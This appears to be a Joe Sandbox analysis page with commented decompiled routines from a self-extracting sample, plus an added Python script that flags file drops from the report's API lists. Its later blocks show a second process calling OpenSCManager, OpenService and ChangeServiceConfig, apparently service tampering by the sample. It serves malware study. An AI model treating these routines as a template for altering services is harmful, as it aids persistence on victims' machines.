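Because XOR is commutative the argument order does not change the result; what matters for an analyst is that the cookie observed in the dump (0x42de454f) is neither the default nor zero in its high word, so the CRT accepted its first derivation, and that any single-byte corruption of the per-frame copy makes the epilogue check fail.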

C-Code - Quality: 88%
    // Writes one extracted file into the self-extractor's work directory. The IXPnnn.TMP
    // naming is the WEXTRACT/IExpress convention, so this is the SFX stub that unpacks the
    // payload (editor's reading of the listing, not a label given by the report). Trailing
    // comments give the instruction address of each statement (the report's address column).
    // E00FD1781/E00FD658A are the report's names for the path-building helpers; their roles
    // are inferred from their arguments. The API trace below shows the same path literal
    // with the user name masked.
    E00FD63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
        signed int _v8;
        char _v268;
        long _v272;
        void* _v276;
        void* __ebx;
        void* __edi;
        void* __esi;
        signed int _t15;
        long _t28;
        struct _OVERLAPPED* _t37;
        void* _t39;
        signed int _t40;

        // /GS prologue: per-frame cookie = __security_cookie ^ ebp, verified on return
        _t15 =  *0xfd8004; // 0x42de454f                                                   // 0x00fd63cb
        _v8 = _t15 ^ _t40;                                                                 // 0x00fd63d2
        _v272 = _v272 & 0x00000000;    // bytes written                                    // 0x00fd63d8
        _push(__ecx);                                                                      // 0x00fd63ea
        _v276 = _a16;                  // source buffer                                    // 0x00fd63f3
        _t37 = 1;                      // result, TRUE until a step fails                  // 0x00fd6401
        // Build "<work dir>\<name>" in a MAX_PATH (0x104) buffer: the directory is an
        // embedded literal, the file name comes from _a12
        E00FD1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // 0x00fd6402
        E00FD658A( &_v268, 0x104, _a12);                                                   // 0x00fd6410
        _t28 = 0;                                                                          // 0x00fd6415
        // GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
        _t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);                         // 0x00fd6433
        if(_t39 != 0xffffffff) {       // INVALID_HANDLE_VALUE                             // 0x00fd6438
            _t28 = _a4;                // byte count                                       // 0x00fd6449
            // Failure or short write: record 0x80070052, HRESULT_FROM_WIN32(ERROR_CANNOT_MAKE)
            if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {           // 0x00fd6463
                 *0xfd9124 = 0x80070052;                                                   // 0x00fd646d
                _t37 = 0;                                                                  // 0x00fd6477
            }                                                                              // 0x00fd6477
            CloseHandle(_t39);                                                             // 0x00fd647a
        } else {                                                                           // 0x00fd643a
             *0xfd9124 = 0x80070052;   // same error code when the file cannot be created  // 0x00fd643a
            _t37 = 0;                                                                      // 0x00fd6444
        }                                                                                  // 0x00fd6444
        // Epilogue: cookie check (_v8 ^ _t40 must equal the global), then return _t37
        return E00FD6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);                       // 0x00fd6492
    }

APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD647A
Strings
• C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD63EB
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
• API String ID: 1065093856-256195474
• Opcode ID: 0aa9cc22561c39a025370f49c87f9e301c33554b9492ea2c8b0faeb743f87bf2
• Instruction ID: e6a41584651e10e13f7d9f400176f7d83445c85866d8740f243ef41b00c9c78c
• Opcode Fuzzy Hash: 0aa9cc22561c39a025370f49c87f9e301c33554b9492ea2c8b0faeb743f87bf2
• Instruction Fuzzy Hash: EF210271A0021CABCB10DF65DC85FEB736AEB45310F0401AAF584E3280CAB46D84AFA4
Uniqueness

Uniqueness Score: -1.00%
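The "APIs" lists are the most actionable part of each function block: the CreateFileA arguments above decode to GENERIC_WRITE (0x40000000), CREATE_ALWAYS (2) and FILE_ATTRIBUTE_NORMAL (0x80), followed by WriteFile and CloseHandle, which is a file being written to disk, and the stack-context path uses the IXP###.TMP directory naming of IExpress/wextract self-extracting packages. The following Python triage script is an added example, not part of the Joe Sandbox report: it parses the bullet lines of the two routines on this page (the sample text is copied from the report), including the nested "Part of subcall function" entries, and applies that file-drop rule plus the temp-directory check. The 0x200-byte "same routine" window, the helper names and the finding format are my own choices.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the "APIs" bullets of the two routines on this page, copied
# from the report text (the CreateFile/WriteFile/CloseHandle routine and E00FD47E0).
REPORT_APIS = r"""
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00FD647A
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00FD4E6F), ref: 00FD47EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00FD4823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00FD4847
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
"""

# One bullet: optional "Part of subcall function X:" prefix, Func.MODULE(args), ref: addr
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_WORD_RE = re.compile(r"[0-9A-Fa-f]{1,8}")

# Documented Win32 constants (not taken from the page) used by the drop rule.
GENERIC_WRITE = 0x40000000
CREATE_NEW, CREATE_ALWAYS = 1, 2
# IExpress/wextract self-extractors unpack into %TEMP%\IXP###.TMP\.
IXP_DIR_RE = re.compile(r"\\IXP\d{3}\.TMP\\", re.IGNORECASE)


@dataclass
class ApiCall:
    func: str
    module: str
    args: list               # int for hex words, None for '?', str otherwise
    ref: int                 # call-site address
    subcall: Optional[str]   # nested callee that really issues the call, if any


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None          # value not recovered by the sandbox
    if HEX_WORD_RE.fullmatch(tok):
        return int(tok, 16)
    return tok               # string/stack context such as a path


def parse_api_calls(text: str) -> List[ApiCall]:
    """Turn the report's 'APIs' bullet lines into structured call records."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue         # headings, blank lines, non-API bullets
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["func"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


def find_file_drops(calls: List[ApiCall], window: int = 0x200) -> list:
    """Flag a CreateFile* opened with GENERIC_WRITE and a creating disposition that is
    followed, within `window` bytes of code (a 'same routine' heuristic), by WriteFile
    and CloseHandle."""
    ordered = sorted(calls, key=lambda c: c.ref)
    findings = []
    for i, c in enumerate(ordered):
        if not c.func.startswith("CreateFile") or len(c.args) < 5:
            continue
        access, disposition = c.args[1], c.args[4]
        if not isinstance(access, int) or not access & GENERIC_WRITE:
            continue
        if disposition not in (CREATE_NEW, CREATE_ALWAYS):
            continue
        later = [d for d in ordered[i + 1:] if d.ref - c.ref <= window]
        write = next((d for d in later if d.func == "WriteFile"), None)
        close = next((d for d in later if d.func == "CloseHandle"), None)
        if write and close:
            # lpFileName itself is '?' in the report; the trailing path is stack
            # context the sandbox printed, so it is only a hint, not the file name.
            hint = next((a for a in c.args if isinstance(a, str) and "\\" in a), None)
            findings.append({"create_ref": c.ref, "write_ref": write.ref,
                             "close_ref": close.ref, "path_hint": hint})
    return findings


def find_sfx_temp_dirs(calls: List[ApiCall]) -> set:
    """Collect IExpress-style IXP###.TMP directories seen in any argument."""
    return {a for c in calls for a in c.args if isinstance(a, str) and IXP_DIR_RE.search(a)}


def triage(text: str) -> dict:
    calls = parse_api_calls(text)
    return {
        "calls": len(calls),
        "file_drops": find_file_drops(calls),
        "sfx_temp_dirs": sorted(find_sfx_temp_dirs(calls)),
        "shows_error_dialog": any(c.func.startswith("MessageBox") for c in calls),
    }


if __name__ == "__main__":
    for key, value in triage(REPORT_APIS).items():
        print(f"{key}: {value}")
```

The address window is deliberately loose: the report groups calls per routine, but once the bullets are extracted as flat text that grouping is lost, so the rule relies on call-site proximity and should be re-checked against the decompiled block before it is used as an indicator.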

C-Code - Quality: 100%
			E00FD47E0(intOrPtr* __ecx) {
				/* Appends a heap copy of the NUL-terminated string in ECX (here the
				   extraction directory C:\Users\user\AppData\Local\Temp\IXP003.TMP\,
				   per the xref at 00FD4851) to a singly linked list whose head is the
				   global at 0xfd91e0. Each node is 8 bytes: [0] = string copy, [4] = next.
				   Returns 1 on success, 0 after showing an error dialog on failure. */
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;
				void* _t5; // decompiler artifacts: uninitialised register values that are
				void* _t8; // passed through to E00FD44B9 on the two failure paths

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8); // 0x40 = LPTR: fixed, zero-initialised 8-byte node
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do { // inlined strlen; _t22 - _t27 + 1 == strlen(_t33) + 1 afterwards
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1); // buffer for the copy, terminator included
					 *_t34 = _t24;                            // node[0] = string buffer
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do { // strlen again to get the copy length
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00FD1680(_t24, _t28 - _t19 + 1, _t33); // (dest, length, src): presumably a memcpy-style copy
						_t11 =  *0xfd91e0; // 0x33d8f70   current list head
						 *(_t34 + 4) = _t11;               // node[4] = old head
						 *0xfd91e0 = _t34;                 // push: the new node becomes the head
						return 1;
					}
					_t25 =  *0xfd8584; // 0x0   owner window handle (NULL here)
					E00FD44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8); // string-table error dialog (LoadStringA + MessageBoxA; 0x10 = MB_ICONERROR)
					LocalFree(_t34);                              // free the node whose buffer could not be allocated
					L2:
					return 0;
				}
				_t26 =  *0xfd8584; // 0x0
				E00FD44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5); // same error dialog when the node itself cannot be allocated
				goto L2;
			}

Instruction addresses (per decompiled line): 0x00fd47e8 to 0x00fd4876

APIs
• LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00FD4E6F), ref: 00FD47EA
• LocalAlloc.KERNEL32(00000040,?), ref: 00FD4823
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00FD4847
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
Strings
• C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00FD4851
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Local$Alloc$FreeLoadMessageString
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
• API String ID: 359063898-256195474
• Opcode ID: 029735e2472be3696f5591482065ff59bc99f2297c345db7f90537b313abf698
• Instruction ID: 7a58579bed4196500a3b1e04c6964e39bc08d3ca9263207d9fa87a838cf7b181
• Opcode Fuzzy Hash: 029735e2472be3696f5591482065ff59bc99f2297c345db7f90537b313abf698
• Instruction Fuzzy Hash: 321106756056426FD7158F34EC18F723B6BEB85390F08851BE94297381DA35AC06B660
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00FD3680(void* __ecx) {
				/* Waits on the kernel object handle passed in ECX while pumping window
				   messages so the UI stays responsive, and records whether WM_QUIT (0x12)
				   arrived while waiting. */
				void* _v8;            // the handle to wait on
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;  // set to 1 once WM_QUIT has been seen

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					// 0x4ff = QS_ALLINPUT: returns 0 (WAIT_OBJECT_0) when the handle is signalled,
					// 1 when queued input is available; INFINITE timeout. Note that a WAIT_FAILED
					// result would also fall through to the message pump and loop again.
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break; // the waited-on object is signalled
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) { // 1 = PM_REMOVE
						continue;
					} else {
						do { // drain the queue, dispatching everything except WM_QUIT
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1; // remember WM_QUIT instead of dispatching it
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
                                                                                                                                                                                                    						if(_t16 == 0) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					break;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                    			}







Instruction addresses for the decompiled lines above (0x00000000 marks lines with no code): 0x00fd368c, 0x00fd368f, 0x00fd3691, 0x00fd369f, 0x00fd36a7, 0x00000000, 0x00000000, 0x00fd36ba, 0x00000000, 0x00fd36bc, 0x00fd36bc, 0x00fd36c0, 0x00fd36cb, 0x00fd36c2, 0x00fd36c4, 0x00fd36c4, 0x00fd36da, 0x00fd36e0, 0x00fd36e6, 0x00000000, 0x00000000, 0x00fd36e6, 0x00000000, 0x00fd36ba, 0x00fd36ed

APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00FD369F
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36B2
• DispatchMessageA.USER32(?), ref: 00FD36CB
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD36DA
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: 24fa9c10ed26554529d24a5d159c5fe6817c35b8c8c6b96af80b0b6bde0a6673
• Instruction ID: bf3520d3413fc59ebe5f7ef5a3a00d560aeadbb883c094cfbd42e7c4066794c2
• Opcode Fuzzy Hash: 24fa9c10ed26554529d24a5d159c5fe6817c35b8c8c6b96af80b0b6bde0a6673
• Instruction Fuzzy Hash: A901A772D0121877DB304BB65C48EEF7B7DEBC6B20F14022BFA15E2284D561C640EA76
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 77%
			E00FD6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0xfd9a3c; // 0xfd0000   module handle kept in a global; equals the image base 0x00FD0000 of this dump
				_t6 = FindResourceA(_t23, __edx, 5);          /* 5 == RT_DIALOG; __edx is the resource name/ID (0x7D6 at the logged call) */
				if(_t6 == 0) {
					L6:
					/* error path: helper E00FD44B9 (defined elsewhere in the report), then the caller-supplied _a16 is returned */
					E00FD44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						/* fifth argument (dwInitParam) of the call below: _a12, or 0 if none was given */
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						/* run the in-memory dialog template modally; _a4 is the parent window, _a8 the dialog procedure */
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);                   /* obsolete on Win32 (16-bit leftover), effectively a no-op */
						if(_t24 == 0xffffffff) {              /* -1: the dialog could not be created */
							goto L6;
						}
					}
				}
				return _t24;
			}







Instruction addresses for the decompiled lines above (0x00000000 marks lines with no code): 0x00fd651f, 0x00fd652a, 0x00fd6534, 0x00fd656b, 0x00fd6577, 0x00fd657c, 0x00fd6536, 0x00fd653e, 0x00fd6542, 0x00000000, 0x00fd6544, 0x00fd6547, 0x00fd654c, 0x00fd6549, 0x00fd6549, 0x00fd6549, 0x00fd655e, 0x00fd6560, 0x00fd6569, 0x00000000, 0x00000000, 0x00fd6569, 0x00fd6542, 0x00fd6587

APIs
• FindResourceA.KERNEL32(00FD0000,000007D6,00000005), ref: 00FD652A
• LoadResource.KERNEL32(00FD0000,00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FD6538
• DialogBoxIndirectParamA.USER32(00FD0000,00000000,00000547,00FD19E0,00000000), ref: 00FD6557
• FreeResource.KERNEL32(00000000,?,?,00FD2EE8,00000000,00FD19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FD6560
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID:
• API String ID: 1214682469-0
• Opcode ID: 0283023f198efd3b4d2c3edaecd8731be74b6d28625a184af378933947b7287a
• Instruction ID: 026f1fa1a46b25acad46fd3db8a390eedcedec756764ce2080e0011796524de1
• Opcode Fuzzy Hash: 0283023f198efd3b4d2c3edaecd8731be74b6d28625a184af378933947b7287a
• Instruction Fuzzy Hash: 2F012672501209BBCB106FB9AC08EBB7B6EEB85370F08012BFE00D3250D7719D50AAA5
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 72%
// Decompiled helper: truncates the string in __ecx at its last backslash
// (PathRemoveFileSpec-style). Returns 1 if a backslash was found and the
// string was cut, 0 otherwise. The "??" argument is unresolved in the
// decompiler output and is left as-is.
E00FD65E8(char* __ecx) {
	char _t3;
	char _t10;
	char* _t12;
	char* _t14;
	char* _t15;
	CHAR* _t16;

	_t12 = __ecx;
	_t15 = __ecx;
	_t14 =  &(__ecx[1]);
	_t10 = 0;
	// Inline strlen: after the loop _t12 - _t14 + __ecx points at the terminating NUL.
	do {
		_t3 =  *_t12;
		_t12 =  &(_t12[1]);
	} while (_t3 != 0);
	// Start from the last character and walk backwards with CharPrevA (DBCS-safe).
	_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
	while(1) {
		_t16 = CharPrevA(_t15, ??);
		if(_t16 <= _t15) {
			break;
		}
		if( *_t16 == 0x5c) { // '\\'
			L7:
			// Keep the backslash when it is the root ("\" or "C:\"), i.e. at the
			// start of the buffer or directly after a drive-letter colon.
			if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) { // ':'
				_t16 = CharNextA(_t16);
			}
			 *_t16 = _t10; // _t10 is still 0 here: write the terminating NUL
			_t10 = 1;
		} else {
			_push(_t16);
			continue;
		}
		L11:
		return _t10;
	}
	// Reached the first character without finding a separator; it may itself be one.
	if( *_t16 == 0x5c) {
		goto L7;
	}
	goto L11;
}

APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00FD2B33), ref: 00FD6602
• CharPrevA.USER32(?,00000000), ref: 00FD6612
• CharPrevA.USER32(?,00000000), ref: 00FD6629
• CharNextA.USER32(00000000), ref: 00FD6635
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 9e6d0f5c4c8a9e2980e477c8e4ddc65a15795e6a3e3403dfa3a7d02dcd0d9b5b
• Instruction ID: c8bbec9350f52d2f0c14f7743634a895edf1c7cb58bc6a80e1540ff8fba8f69c
• Opcode Fuzzy Hash: 9e6d0f5c4c8a9e2980e477c8e4ddc65a15795e6a3e3403dfa3a7d02dcd0d9b5b
• Instruction Fuzzy Hash: 11F028328051506EE7321F389C889BBBF9FCF8B374B2D01AFE491C6201D6164E46AA61
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Decompiled C runtime start-up stub: initialises the MSVCRT app type,
// file/commit modes and the user math-error handler before handing off
// to E00FD71EF (the next stage of start-up).
E00FD69B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	 *0xfd81f8 = E00FD6C70();
	// __set_app_type tells the CRT whether this is a console or GUI process.
	__set_app_type(E00FD6FBE(2));
	 *0xfd88a4 =  *0xfd88a4 | 0xffffffff;
	 *0xfd88a8 =  *0xfd88a8 | 0xffffffff;
	// Copy the image's default _fmode and _commode values into the CRT globals.
	_t4 = __p__fmode();
	_t11 =  *0xfd8528; // 0x0
	 *_t4 = _t11;
	_t5 = __p__commode();
	_t12 =  *0xfd851c; // 0x0
	 *_t5 = _t12;
	_t6 = E00FD7000();
	if( *0xfd8000 == 0) {
		// Install E00FD7000 as the CRT math-error callback.
		__setusermatherr(E00FD7000);
	}
	E00FD71EF(_t6);
	return 0;
}

APIs
• Part of subcall function 00FD6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00FD6FC5
• __set_app_type.MSVCRT ref: 00FD69C2
• __p__fmode.MSVCRT ref: 00FD69D8
• __p__commode.MSVCRT ref: 00FD69E6
• __setusermatherr.MSVCRT ref: 00FD6A07
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 3ce41d944a9dbab72fd0688eac6c5d4c6e7a903edcd3a9290e64983bcd4c43b3
• Instruction ID: 31fb2eb9ef72096efda9031ada13106cef59353e5edbb3def78d789b7f3d8254
• Opcode Fuzzy Hash: 3ce41d944a9dbab72fd0688eac6c5d4c6e7a903edcd3a9290e64983bcd4c43b3
• Instruction Fuzzy Hash: 19F0F87050A3098FC714AB35AD0E6083B63FB04372B18460BE4A1863E4DF3E9546BA15
Uniqueness
Uniqueness Score: -1.00%

Callgraph

Control-flow Graph (graph image not reproduced): function 7ffbace61b10-7ffbace62048; block 7ffbace61f26-7ffbace61fe2 calls ChangeServiceConfigA; block 7ffbace61fea-7ffbace61ffc calls 7ffbace62049.
APIs
Memory Dump Source
• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
Similarity
• API ID: ChangeConfigService
• String ID:
• API String ID: 3849694230-0
• Opcode ID: 25f4d0fa5f7fdbbb15b383a3375312782906dc8e6c69f4aa854276c1247b6e4d
• Instruction ID: bb132d314eb43a929759f288089e1c7f2914ee1cf4447928ce6a288266700d83
• Opcode Fuzzy Hash: 25f4d0fa5f7fdbbb15b383a3375312782906dc8e6c69f4aa854276c1247b6e4d
• Instruction Fuzzy Hash: BFF1A370928A4E4FEB69DE28D84A7F977D0FB54311F10426AEC4EC7291DA74E5818B82
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: 6008e5e268863e4dfbc076c2aa508a7742d35526728dee1705c4e287925bb39d
• Instruction ID: c7d2f1d950349f3271987a635adcd01b6060ae6a4d5854c917d3edb1f205dee4
• Opcode Fuzzy Hash: 6008e5e268863e4dfbc076c2aa508a7742d35526728dee1705c4e287925bb39d
• Instruction Fuzzy Hash: B7916E70618A4D8FEBA9EF28C8597E977D1FF54310F00416AE84EC7291DB78A985CB81
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced): function 7ffbace60c34-7ffbace60e01; block 7ffbace60d40-7ffbace60daa calls OpenServiceA; block 7ffbace60db2-7ffbace60de6 calls 7ffbace60e02.

APIs
Memory Dump Source
• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
Similarity
• API ID: OpenService
• String ID:
• API String ID: 3098006287-0
• Opcode ID: 3a75a217f23de1911e737ae4bff967350deb5e9cce94b35f724efb74e4d65644
• Instruction ID: 73640eeb3c68f4adabe7de7aaa99320d8c18b22f40cd16b6342a733f850b4fff
• Opcode Fuzzy Hash: 3a75a217f23de1911e737ae4bff967350deb5e9cce94b35f724efb74e4d65644
• Instruction Fuzzy Hash: 4C518470518A4D8FDB59EF28D84A7F977D1FB59315F10422AE84EC3292DE74E842CB82
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not reproduced): function 7ffbace60b2d-7ffbace60c2d; block 7ffbace60bd1-7ffbace60c08 calls OpenSCManagerW.

APIs
Memory Dump Source
• Source File: 00000004.00000002.284199442.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffbace60000_buze36rj14.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
• Opcode ID: 450e9515a5d2da9de7335b60311a062e27d389d31a84452c9e5c6366e58add7e
